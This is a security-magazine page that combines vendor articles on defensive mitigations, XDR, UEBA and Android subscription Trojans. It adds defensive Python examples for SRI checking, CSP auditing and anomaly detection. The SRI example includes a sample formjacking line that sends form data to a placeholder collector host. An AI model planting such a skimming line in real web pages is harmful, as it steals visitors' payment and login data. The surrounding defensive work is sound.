Expert Speak

Cybersecurity Mitigations No Organisation Can Afford to Ignore

Sander Vinberg, the Senior Threat Evangelist at F5 Labs, highlights the tactics organisations need to stay safe

Every year, F5 Labs publishes the Application Protection Report. Our goal is to document the evolution of the threat landscape so that security practitioners can fine-tune their defenses accordingly. The report aims to clarify the relationship between target characteristics and attacker behaviour so that each organization can focus on the threats that apply most to them.

Based on our research, these are the cybersecurity mitigation measures no organisation can afford to ignore. (Note – The analysis is primarily based on successful attacks, so the recommendations are more of a bare minimum than a complete, holistic security architecture).

Data Backup
Data backups need to be part of every organization’s strategy, and it is often difficult to assess the robustness of a backup program until it is tested. Many good backup programs employ several different modes, with longer-term backups air-gapped, stored on physical media off-site, or using other degrees of protection.

However, beginning in 2020, ransomware operators shifted to exfiltrating data before triggering encryption, which limits how much even a good backup program can do to control ransomware risk. With the right backups you can restore operations once the environment has been cleaned up, but the stolen data cannot be recovered, and you still have to deal with the attacker and the extortion demand. A robust ransomware strategy therefore starts with backup but must also control the attacker behaviours that precede encryption: initial access, lateral movement, execution, persistence, and exfiltration.

Application Isolation and Sandboxing
This control primarily takes the form of virtualization in its various guises: virtual machines, containers, and browser sandboxing. It can help mitigate several exploit-based approaches observed in 2021, including Exploitation for Client Execution, Exploit Public-Facing Application, and Drive-by Compromise.

Exploit Protection
The most obvious form of exploit protection is a web application firewall (WAF). Despite the declining prevalence of web exploits in the data, a WAF is still critical for operating a modern web application. PCI DSS also calls for one: version 3.2.1 (Requirement 6.6) accepts a WAF as one of two acceptable ways to protect public-facing web applications, and version 4.0 (Requirement 6.4.2) makes an automated technical solution such as a WAF mandatory from 31 March 2025. That standard applies specifically to the card numbers so heavily targeted by formjacking attacks. A growing number of behavioural approaches to exploit protection also appear promising.

Network Segmentation
Network segmentation is a particularly underrated control, given how ransomware approaches have changed the threat landscape since the pandemic began.

It can shut down a huge number of attack vectors, five of which were observed in the 2021 data: Exploit Public-Facing Application, Automated Exfiltration, Exfiltration Over Web Service, External Remote Services, and Exploitation of Remote Services.

Furthermore, it makes exfiltration and lateral movement particularly difficult. Some cloud-native applications may have implemented the same control objectives using identity and access management, but for organizations with hybrid environments or legacy applications in the process of moving to the cloud, this is still an important approach.

Privileged Account Management
Creating privileged accounts is straightforward; deleting them is often overlooked. Audit them regularly so that accounts are decommissioned as soon as they are no longer needed, and so that each one still maps to a named owner and a current business purpose.

Update Software
The Log4Shell campaign that unfolded in December 2021 (CVE-2021-44228 in Apache Log4j 2) is a reminder of the importance of software maintenance, not merely for the software organizations produce or use directly, but for all of the subcomponents and libraries needed to keep everything running.

Vulnerability Scanning
Regular vulnerability scanning adds situational awareness and flexibility to a vulnerability management program. This should include a public-facing scan from the Internet and an internal scan to assess how an environment appears to attackers.

Code Signing
Code signing is another underused approach, particularly in light of architectural trends that pull code from disparate sources at runtime. In the browser, Subresource Integrity (SRI) serves the same purpose: an integrity attribute on a script or link tag carries a hash of the expected file, and the browser refuses to execute a fetched resource whose hash does not match, so an external script cannot be modified unnoticed between publication and use. As applications increasingly rely on third-party scripts to add features, SRI is a powerful tool for shutting down vectors, including many of the initial access techniques seen in formjacking and Magecart attacks. The caveat is that SRI only works for resources whose content is fixed: a third-party script that changes without notice will fail to load rather than load modified, so updating the pinned hash has to be part of the release process.
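As an added illustration of how the SRI check works (example code, not anything from the F5 Labs report), the following Python computes the integrity value for a script, emits the tag a build step would write, and mimics the browser's verification. It also shows the spec behaviour a practitioner most needs to know: an attribute that lists only an unrecognised algorithm is treated as no integrity requirement at all, and when several algorithms are listed only the strongest is checked. The script bodies, the CDN URL and the helper names are constructed for this example.

```python
"""Subresource Integrity (SRI) from the defender's side.

Added example, not code from the F5 Labs report: the helper names, the
sample script bodies and the URL below are assumptions for illustration.
"""
import base64
import binascii
import hashlib

# Digest algorithms the SRI specification recognises, weakest to strongest.
SRI_STRENGTH = {"sha256": 1, "sha384": 2, "sha512": 3}


def sri_value(body: bytes, algorithm: str = "sha384") -> str:
    """Return the value to put in the integrity attribute for this file."""
    if algorithm not in SRI_STRENGTH:
        raise ValueError(f"unsupported SRI algorithm: {algorithm}")
    digest = hashlib.new(algorithm, body).digest()
    return f"{algorithm}-{base64.b64encode(digest).decode('ascii')}"


def script_tag(url: str, body: bytes) -> str:
    """Emit the tag a build step would write for a third-party script.
    crossorigin is required for the check to apply to cross-origin scripts."""
    return (f'<script src="{url}" integrity="{sri_value(body)}" '
            f'crossorigin="anonymous"></script>')


def verify_sri(body: bytes, integrity: str) -> bool:
    """Mimic the browser's check of a fetched resource body.

    Follows the spec rules that matter in practice: tokens with an unknown
    algorithm or malformed digest are ignored, only the strongest listed
    algorithm is considered, and if nothing parses the resource is loaded
    with NO check at all.
    """
    parsed = []
    for token in integrity.split():
        algorithm, sep, rest = token.partition("-")
        if not sep or algorithm not in SRI_STRENGTH:
            continue                      # unknown algorithm: ignored
        b64 = rest.split("?", 1)[0]       # options after '?' are ignored
        try:
            parsed.append((algorithm, base64.b64decode(b64, validate=True)))
        except binascii.Error:
            continue                      # malformed digest: ignored
    if not parsed:
        return True   # spec behaviour: no usable metadata means no integrity check
    strongest = max(SRI_STRENGTH[a] for a, _ in parsed)
    actual = {a: hashlib.new(a, body).digest() for a, _ in parsed}
    return any(SRI_STRENGTH[a] == strongest and actual[a] == expected
               for a, expected in parsed)


# Constructed sample: the script a checkout page legitimately includes, and the
# same script after a formjacking-style modification at the CDN.
LEGIT_SCRIPT = b"window.checkout = function (form) { /* validate and submit */ };\n"
TAMPERED_SCRIPT = LEGIT_SCRIPT + (
    b"document.addEventListener('submit', e => "
    b"navigator.sendBeacon('https://collector.invalid/c', new FormData(e.target)));\n"
)

if __name__ == "__main__":
    pinned = sri_value(LEGIT_SCRIPT)
    print(script_tag("https://cdn.example/checkout.js", LEGIT_SCRIPT))
    print("legit loads:    ", verify_sri(LEGIT_SCRIPT, pinned))
    print("tampered loads: ", verify_sri(TAMPERED_SCRIPT, pinned))
    # The trap: an attribute that only lists an unsupported algorithm is
    # silently treated as no integrity requirement.
    print("sha1-only loads:", verify_sri(TAMPERED_SCRIPT, "sha1-ABCDEF=="))
```

Pin the value emitted by `sri_value` in the page, and regenerate it in the build whenever the vendored script legitimately changes; a mismatch at runtime should be treated as a failed load to investigate, not as a reason to drop the attribute.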

Restrict Web-Based Content
This is a broad-reaching control objective that can manifest in many ways, all centering on controlling the avenues for both unauthorised access and exfiltration, such as blocking specific file types, known malicious IP addresses, and external scripts. This approach can shut off a wide range of attack vectors, including malicious script injection, phishing, and malvertising.

Content security policies (CSPs) appear underused for such a powerful and free control for restricting web content. During a scan that F5 Labs ran in August 2021 for the 2021 TLS Telemetry Report, HTTP response headers for the Tranco top 1 million sites were also collected. Just over 6% of the top 1 million returned a CSP header. The most frequent directive in those policies was upgrade-insecure-requests, which tells the browser to rewrite the page's plain-HTTP resource and navigation requests to HTTPS before sending them; it appeared on 2.5% of sites, followed closely by frame-ancestors, which controls which sites may embed the page in a frame. The directives that actually constrain where scripts and other content may be loaded from, and so block the injection of malicious scripts, such as script-src, img-src, and frame-src, are less common.
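The survey above counts directives across collected response headers and the paragraph explains which directives actually restrict script loading. The following Python, an added example rather than F5 Labs code, does both on a constructed sample: it parses CSP headers the way a browser does (a repeated directive is ignored after its first occurrence), tallies which directives appear and on how many sites, and audits each policy for the gaps the paragraph describes, including the CSP2 rule that a nonce or hash in script-src makes 'unsafe-inline' ineffective. The hostnames, header values and finding strings are this example's own.

```python
"""Audit Content-Security-Policy headers as a header survey would.

Added example, not F5 Labs code: the sample sites and header values are
constructed, and the finding strings are this example's own.
"""
from collections import Counter

# Constructed sample of hostname -> CSP header value. An empty string means
# the server sent no Content-Security-Policy header at all.
SAMPLE_RESPONSES = {
    "shop.example": "upgrade-insecure-requests; frame-ancestors 'self'",
    "news.example": "default-src 'self'; script-src 'self' 'unsafe-inline' "
                    "https://cdn.example; img-src *",
    "bank.example": "default-src 'none'; script-src 'self' 'nonce-r4nd0m'; "
                    "img-src 'self'; frame-ancestors 'none'; "
                    "upgrade-insecure-requests",
    "blog.example": "",
}

HASH_OR_NONCE = ("'nonce-", "'sha256-", "'sha384-", "'sha512-")


def parse_csp(header: str) -> dict:
    """Split a CSP header into {directive: [source expressions]}.
    As in browsers, a repeated directive is ignored after its first occurrence."""
    policy = {}
    for directive in header.split(";"):
        tokens = directive.split()
        if tokens:
            policy.setdefault(tokens[0].lower(), tokens[1:])
    return policy


def audit_csp(header: str) -> list:
    """Return human-readable findings for one policy (empty list = no finding)."""
    policy = parse_csp(header)
    if not policy:
        return ["no Content-Security-Policy header"]
    findings = []
    # script-src falls back to default-src; if neither is set, any script loads.
    script_sources = policy.get("script-src", policy.get("default-src"))
    if script_sources is None:
        findings.append("scripts unrestricted: neither script-src nor default-src set")
    else:
        keyed = any(s.startswith(HASH_OR_NONCE) for s in script_sources)
        # With a nonce or hash present, browsers ignore 'unsafe-inline' (CSP2+).
        if "'unsafe-inline'" in script_sources and not keyed:
            findings.append("inline scripts allowed: 'unsafe-inline' without nonce or hash")
        if any(s in ("*", "https:", "http:") for s in script_sources):
            findings.append("scripts allowed from any host")
    if "frame-ancestors" not in policy:
        findings.append("no frame-ancestors: page can be framed (clickjacking)")
    return findings


def survey(responses: dict):
    """Count sites that send a CSP and how often each directive appears,
    as a scan over collected response headers would."""
    directives = Counter()
    with_csp = 0
    for header in responses.values():
        policy = parse_csp(header)
        if policy:
            with_csp += 1
            directives.update(policy.keys())
    return with_csp, len(responses), directives


if __name__ == "__main__":
    n, total, freq = survey(SAMPLE_RESPONSES)
    print(f"{n}/{total} sites send a CSP; directive frequency: {freq.most_common()}")
    for host, header in SAMPLE_RESPONSES.items():
        print(host, audit_csp(header) or ["ok"])
```

Run against real data by replacing the sample dictionary with the Content-Security-Policy header values captured from your own sites; the audit treats a missing script-src and default-src as the most serious gap, because that policy restricts no script sources at all even though the site counts as "having a CSP".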

Network Intrusion Prevention
Intrusion prevention systems are no longer the leading-edge controls that they were a decade or more ago, but as lateral movement and deployment of malware appear to be on the rise, this kind of control is valuable as part of a defense-in-depth approach that also uses a WAF and other controls.

Antivirus/Antimalware
Every organisation of every type should have antimalware capabilities. However, because malware has to be placed on a system before it can run, it is never the first step in an attack, so antimalware needs to be one layer in a more holistic strategy rather than the strategy itself.

Disable or Remove Feature or Program
While the corresponding attack techniques were observed in only 12% of attack chains, disabling or removing unneeded features and programs would mitigate five techniques seen in the 2021 data: Command and Scripting Interpreter, Exfiltration Over Web Service, External Remote Services, Exploitation of Remote Services, and Cloud Instance Metadata API. The Log4Shell events of December 2021 are a reminder that zero trust and least privilege need to apply to systems as well as to people, all the more so as applications and environments grow in complexity.

Special Mention: Cloud Configuration Management
An organisation that never had configuration management or change management structures on premises still needs them in the cloud. Guides and information on cloud configuration management are plentiful for all the public clouds, and organisations running customer-facing applications in the cloud should treat those guides as doctrine.

Cyber Security

It’s Time to Debunk XDR Misconceptions Floating Around

Written by Yossi Naar, Chief Visionary Officer, and Cofounder, Cybereason

Extended Detection and Response (XDR) is everywhere today, and it seems that every company is rolling out a strategy and products to meet the growing demand. According to the industry analyst firm Gartner, XDR is “a SaaS-based, vendor-specific, security threat detection and incident response tool that natively integrates multiple security products into a cohesive security operations system that unifies all licensed components.”

Notwithstanding XDR’s tremendous growth in adoption, more than a few misconceptions about XDR remain, so let’s debunk three of those myths here:

Myth 1: XDR is all about Endpoint Security
No, that’s what Endpoint Detection and Response (EDR) does, which is just one aspect of what XDR delivers. EDR solutions focus solely on the endpoint, and they don’t correlate intelligence from the cloud and other parts of an organization’s infrastructure.

In fact, most EDR platforms are not even capable of ingesting all of the relevant endpoint telemetry and are forced to “filter out” intelligence without even knowing if that information is critical to making a detection because the solutions cannot handle the volumes of data generated.

Indeed, there are vendors that simply cannot ingest all available telemetry for EDR, yet they profess to be able to deliver an XDR solution that ingests endpoint data plus an array of telemetry from numerous other sources on the network and in the cloud.

Data filtering negatively impacts the ability to proactively thwart attacks because it omits telemetry that could allow for earlier detection of malicious activity. When broadened to include non-endpoint sources, data filtering can further distort an organization’s visibility into the threats confronting them.

XDR does not suffer from these limitations. It extends continuous threat detection and monitoring, as well as automated response, to endpoints, applications, cloud workloads, and the network, all without data filtering. This helps ensure the high fidelity of the detections XDR yields.

Myth 2: XDR Should be Augmented by a SIEM
It’s true that XDR delivers some of the same functionality as SIEM (Security Information and Event Management) tools. Chief among their similarities is the ability to aggregate and correlate data from a variety of sources spread across an organization’s infrastructure, thereby providing the required visibility for threat detection, investigation and response.

But there are several key factors that hold SIEMs back: SIEMs are nothing without the data lake structure and cloud analytics they need to centralize security events. Those resources vary in the types and quality of data to which they have access, a reality that affects the value and effectiveness of a SIEM.

There are also the costs, time, and other resources involved with building, tuning, and maintaining a SIEM. Tuning is an especially common pain point with SIEMs. Indeed, these tools frequently generate false positives and an overwhelming volume of alerts.

Such noise contributes to “alert fatigue” in the organization, motivating infosec personnel to overlook the deluge of alerts coming in and miss opportunities to launch investigations at the earliest signs of an incursion. Simultaneously, SIEMs don’t do much to help security teams with executing a response beyond generating a lot of alerts that need to be manually triaged.

XDR, by contrast, doesn’t require any data lake structure. It correlates alerts across disparate network assets to deliver actionable intelligence that works to reduce alert fatigue. What’s more, XDR enables security teams to build automated playbooks using the platform itself, thereby streamlining response.

Myth 3: All XDR Platforms Are Created Equal
No. Consider the fact that there’s hybrid/open vs. native XDR. The latter only offers integrations to other security tools developed by the same vendor. This can lock customers into an agreement with a vendor that might not offer the security capabilities they need to protect their systems and data. It also means existing investments in solutions from other vendors cannot be fully realized.

In contrast, Open (or hybrid) XDR takes a collective approach that leverages multiple security tools, vendors, and telemetry types to meet organizations’ needs from within a single detection and response platform. There’s no vendor lock-in here. Security teams are free to choose the vendors and tools they want, allowing them to get the most out of their XDR platform, and the DevOps and API integrations enable personnel to bring these tools and telemetry sources together.

There’s also an argument to be made about what defines a truly mature XDR offering versus pseudo-XDR solutions that are basically nothing more than an EDR tool with cloud integration. All XDR platforms integrate with threat intelligence to spot known Indicators of Compromise (IOCs), but only an advanced XDR solution can detect them based on Indicators of Behavior (IOBs).

IOBs are the more subtle signs of an attack in progress which include otherwise benign activity one would expect to see occurring on a network. When these “legitimate” behaviors are chained in certain sequences, they produce conditions that are either exceedingly rare or represent a distinct advantage for an attacker.

This is where the context-rich correlations across endpoints, the cloud, application suites, and user identities that a mature XDR solution delivers are critical for detecting malicious activity at the earliest stages of an attack. Take ransomware attacks for example – most security solutions are focused on detecting the exploit and blocking the ransomware payload, or rolling back the encryption after the attack was successful. But the detonation of the ransomware executable is the tail end of what is actually a much longer attack sequence, with weeks or even months of detectable activity from initial ingress, to lateral movement, to credential abuse and privilege escalation, to name a few.

An AI-driven XDR solution can make the necessary correlations to detect that activity long before the ransomware payload is delivered, reducing a potentially devastating attack to the level of an intrusion attempt or similar. The ability to use AI/ML to correlate telemetry from across an organization’s infrastructure is a key aspect of a mature XDR solution. Applying AI/ML allows defenders to move from a detect-and-respond mode to a more proactive “predictive response” posture, in which the next steps an attack can and would take are anticipated and blocked, eliminating the opportunity to progress the attack to the next stage.

This predictive capability is the key to the future of security, enabling organizations to “defend forward” by understanding attacks from an operation-centric approach, where analysts are freed from chasing alerts that point to individual elements of an attack in favor of a holistic view of the entire attack story from root cause to every affected device, system and user. And only an AI-driven XDR solution can deliver this “predictive response” capability that will shorten detection and remediation periods from days or weeks down to minutes.

The AI-Driven XDR Advantage
An AI-driven XDR solution enables organizations to embrace an operation-centric approach to security that delivers the visibility organizations require to be confident in their security posture across all network assets, and the automated responses to halt attack progressions at the earliest stages. This approach also provides defenders with the ability to predict, detect and respond to cyberattacks across the entire enterprise, including endpoints, networks, identities, cloud, application workspaces, and more.

Expert Speak

Finding Patterns in the Chaos With User and Entity Behaviour Analytics (UEBA)

Written by Sundaram Lakshmanan, CTO of SASE products at Lookout

There’s a great scene in the 1997 film “Contact” where the protagonist Dr. Eleanor Arroway, played by Jodie Foster, is informed that her lab’s funding has just been revoked. Arroway’s lab partner explained that the government lost faith in the project due to concerns about her engaging in questionable activities, such as watching static on TV for hours. To this, she responds angrily: “I was looking for patterns in the chaos, come on!”

This is a great analogy for what User and Entity Behaviour Analytics (UEBA) does automatically for you, so you don’t have to. While Arroway may have been looking for signs of life on other planets, spotting abnormal or malicious patterns in user and entity behaviour can be just as difficult with the naked eye.

On any given day, your employees will log into cloud or on-premises applications, download and upload files, and respond to authentication requests. Tracking these behaviours can be data-intensive, especially when you consider all the different devices and apps your employees use to stay productive, where they are, and at what times they typically interact with those apps.

This is where UEBA comes in. Instead of relying on static security checks or staring continuously at the static, you can use automated security to look at user behaviours to detect both insider and external threats, and prevent data leakage or ransomware attacks.

How UEBA works
To put it simply, UEBA is a cybersecurity process that monitors normal user behaviour and flags deviations from established patterns. While a perpetrator can easily steal an employee’s username and password, it’s much harder to imitate that person’s normal behaviour on the network connecting to apps and data. UEBA also helps detect unintentional or intentional insider threats, where an authorized user does something that is harmful to your organization.

In many ways, UEBA is like a credit card fraud detection engine. UEBA uses machine learning and data analytics to determine when there is anomalous behaviour that could result in a potential security threat. For example, if I normally only download megabytes of files every day but suddenly download gigabytes of files, a UEBA system would detect this anomaly and alert the enterprise security team to respond.

Geo-anomalies are also tell-tale signs of anomalous or malicious behaviour: if someone signs into a work account from Dubai, but minutes later a login to the same account is observed across the world in San Francisco, the UEBA system would automatically detect this anomaly and enable an automated response to protect the data available to the account.
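The two detections described above, the download-volume anomaly and the Dubai-to-San-Francisco geo-anomaly, can be written down in a few dozen lines. The following Python is an added example and not Lookout's code: it scores a day's download volume against the user's own history with a robust z-score (median and MAD, so one earlier spike does not inflate the baseline the way mean and standard deviation would) and flags consecutive logins whose great-circle distance would require implausible travel speed. The login records, the download history and the 1,000 km/h plausibility limit are constructed assumptions.

```python
"""Two UEBA-style detectors: volume anomalies and impossible travel.

Added example, not Lookout's code: the login records, the daily download
history and the 1,000 km/h plausibility limit are assumptions chosen for
illustration.
"""
import math
from datetime import datetime, timezone
from statistics import median

EARTH_RADIUS_KM = 6371.0
MAX_PLAUSIBLE_SPEED_KMH = 1000.0   # assumption: roughly airliner cruise speed


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance between two points in kilometres."""
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi = math.radians(lat2 - lat1)
    dlmb = math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dlmb / 2) ** 2
    return 2 * EARTH_RADIUS_KM * math.asin(math.sqrt(a))


def impossible_travel(logins):
    """logins: (timestamp, lat, lon) tuples for ONE account, in any order.
    Returns (earlier_ts, later_ts, required_kmh) for each consecutive pair
    that would need faster-than-plausible travel."""
    alerts = []
    ordered = sorted(logins, key=lambda e: e[0])
    for prev, cur in zip(ordered, ordered[1:]):
        km = haversine_km(prev[1], prev[2], cur[1], cur[2])
        hours = (cur[0] - prev[0]).total_seconds() / 3600
        if km < 1.0:
            continue                      # same place (or GeoIP jitter): not travel
        speed = math.inf if hours <= 0 else km / hours
        if speed > MAX_PLAUSIBLE_SPEED_KMH:
            alerts.append((prev[0], cur[0], round(speed)))
    return alerts


def volume_anomaly(history_mb, today_mb, threshold=3.5):
    """Flag today's download volume against the user's own baseline with a
    robust z-score (median and MAD). Returns (is_anomalous, score)."""
    med = median(history_mb)
    mad = median(abs(x - med) for x in history_mb) or 1e-9  # guard a flat history
    score = 0.6745 * (today_mb - med) / mad   # 0.6745 scales MAD to sigma for normal data
    return score > threshold, score


# Constructed sample data -----------------------------------------------------
def ts(hhmm):
    h, m = map(int, hhmm.split(":"))
    return datetime(2022, 6, 1, h, m, tzinfo=timezone.utc)

LOGINS = [
    (ts("09:00"), 25.2048, 55.2708),     # Dubai
    (ts("09:05"), 25.2050, 55.2710),     # Dubai again, a few metres away
    (ts("09:20"), 37.7749, -122.4194),   # San Francisco, 15 minutes later
]
DAILY_DOWNLOADS_MB = [12, 15, 9, 20, 11, 14, 13, 10, 16, 12]

if __name__ == "__main__":
    for earlier, later, kmh in impossible_travel(LOGINS):
        print(f"impossible travel: {earlier:%H:%M} -> {later:%H:%M} needs {kmh} km/h")
    print("normal day, 18 MB:  ", volume_anomaly(DAILY_DOWNLOADS_MB, 18))
    print("bulk pull, 4200 MB: ", volume_anomaly(DAILY_DOWNLOADS_MB, 4200))
```

In production the baseline is per user (or per peer group) and the geo check has to tolerate VPN egress points and coarse GeoIP, which is why the distance floor and the speed limit are tunable rather than hard-coded facts.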

I remember an incident with one of our customers where UEBA ended up detecting and halting a ransomware attack. This customer gave their partners access to their Box cloud content management system. Having UEBA in place, their security team received an automated detection of a large volume of files that were deleted and replaced by encrypted files, which were quickly uploaded and renamed. Due to early detection, the security team was able to quarantine the account and restore the files.

UEBA vs. Security Information and Event Management (SIEM)
SIEMs enable security teams to aggregate large volumes of disparate data sets, security alerts and events from multiple sources into a single console for processing and analysis. They have workflows and rule engines that make sense from the processed datasets that further enable administrators to prioritize and manage incidents and alerts better.

With powerful searches, queries, dashboards and rule-based engines, most SIEMs give a full 360° view of the enterprise systems and enable admins to manage incidents in a timely manner. In some cases, they also do spot trends and create correlation rules to trigger appropriate mitigation steps.

Although at first glance, UEBA and SIEM may appear to do the same thing, there are a few key differences. Unlike a SIEM, UEBA does not track security events or monitor devices. Instead, UEBA tracks the behaviours of users and entities within your environment — such as devices, applications and data — for anomalies that may indicate a threat. While UEBA also analyzes a lot of data, it uses machine intelligence to automate and scale its analysis of patterns instead of just relying on human intelligence.

UEBA works best when paired with a holistic platform
While I hope this article has given you a good understanding of UEBA and why it’s important, I want to stress that this is just one piece of a modern cybersecurity architecture. There are two other major elements to consider: continuously monitoring the risk posture of endpoint devices and the sensitivity of the apps and data accessed by users and endpoints.

Whether you realize it or not, every one of your employees is using some form of personal devices to work from anywhere. This means you need to track the fluctuating risk posture of both the managed and unmanaged devices to protect your data at all times. By enforcing policies based on user behaviour, endpoint risk posture as well as data sensitivity, you can protect your data without hindering productivity.

Expert Speak

How Scammers Subscribe Mobile Users to Unwanted Paid Services

With an ever-growing number of smartphone users, the development of mobile applications has become a booming industry. Today there are millions of apps, helping users with almost every aspect of their everyday lives, from entertainment to banking and billing. With this in mind, cybercriminals are working hard to develop their own apps and profit from unsuspecting users.

Kaspersky researchers have observed fraudsters actively spreading Trojans, which secretly subscribe users to paid services, disguised as various different mobile apps, including popular games, healthcare apps and photo editors. Most of these Trojans request access to the user’s notifications and messages, so that the fraudsters can then intercept messages containing confirmation codes.

Users aren’t knowingly subscribing to these services but are, rather, falling victim to carelessness. For instance, a user fails to read the fine print and, before they know it, they’re paying for a horoscope app. These victims often don’t realize these subscriptions exist until their mobile phone account runs dry earlier than expected.

According to Kaspersky researchers, the most widely spread Trojans that sign users up to unwanted subscriptions are:

Jocker
Trojans from the Trojan.AndroidOS.Jocker family can intercept codes sent in text messages and bypass anti-fraud solutions. They’re usually spread on Google Play, where scammers download a legitimate app from the store, add malicious code to it and then re-upload it under a different name. In most cases, these trojanized apps fulfill their purpose and the user never suspects that they’re a source of threat.

So far in 2022, Jocker has most frequently attacked users in Saudi Arabia (21.20%), Poland, (8.98%) and Germany (6.01%).

MobOk
MobOk is considered the most active of the subscription Trojans, accounting for more than 70% of the mobile users who encountered such threats. The MobOk Trojan is particularly notable for an additional capability: in addition to reading the codes from messages, it can bypass CAPTCHA by automatically sending the image to a service designed to decipher the code shown.

Since the beginning of the year, MobOk Trojan has most frequently attacked users in Russia (31.01%), India (11.17%) and Indonesia (11.02%).

Vesub
Vesub Trojan is spread through unofficial sources and imitates popular games and apps, such as GameBeyond, Tubemate, Minecraft, GTA5 and Vidmate. This malware opens an invisible window, requests a subscription and then enters the code it intercepts from the victim’s received text messages. After that the user is subscribed to a service without their knowledge or consent.

Most of these apps lack any legitimate functionality. They subscribe users as soon as they are launched while victims just see a loading window. However, there are some examples, such as a fake GameBeyond app, where the detected malware is actually accompanied by a random set of functional games.

Two out of five users who encountered Vesub were in Egypt (40.27%). This Trojan family has also been active in Thailand (25.88%) and Malaysia (15.85%).

GriftHorse.l
Unlike the Trojans mentioned above, this one does not subscribe victims to a third-party service – instead it uses its own. Users end up subscribing to one of these services by simply not reading the user agreement carefully. For example, there are apps that have recently spread intensively on Google Play, offering to tailor personal weight-loss plans for a token fee. Such apps contain small print mentioning a subscription fee with automatic billing. This means money will be deducted from the user’s bank account on a regular basis without needing any further confirmation from the user.

“Apps can help us stay connected, fit, entertained and generally make our lives easier. There are multiple mobile apps appearing every day, for every taste and purpose – unfortunately, cybercriminals are using this to their advantage. Some of the apps are designed to steal money by subscribing users to unwanted services. These threats are preventable, which is why it’s important to be aware of the signs that give away Trojanized apps. Even if you trust an app, you should avoid granting it too many permissions. Only allow access to notifications for apps that need it to perform their intended purposes, for example, to transfer notifications to wearable devices. Apps for something like themed wallpapers or photo editing don’t need access to your notifications,” explains Igor Golovin, security expert at Kaspersky.

Here’s what you need to do to stay protected:

  • Keep your guard up when installing apps from Google Play. Read the reviews and research the developer, the terms of use and the payment details. For messaging, choose a well-known app with positive reviews.
  • Check the permissions of the apps you’re using and think carefully before granting additional permissions, especially access to notifications or SMS, which is what these Trojans use to intercept confirmation codes.
  • Use a reliable security solution to help detect malicious apps and adware before they achieve their goals.
  • Update your operating system and any important apps as soon as updates become available. Many safety issues can be solved by installing the updated versions of software.
Copyright © 2021 Security Review Magazine. Rysha Media LLC. All Rights Reserved.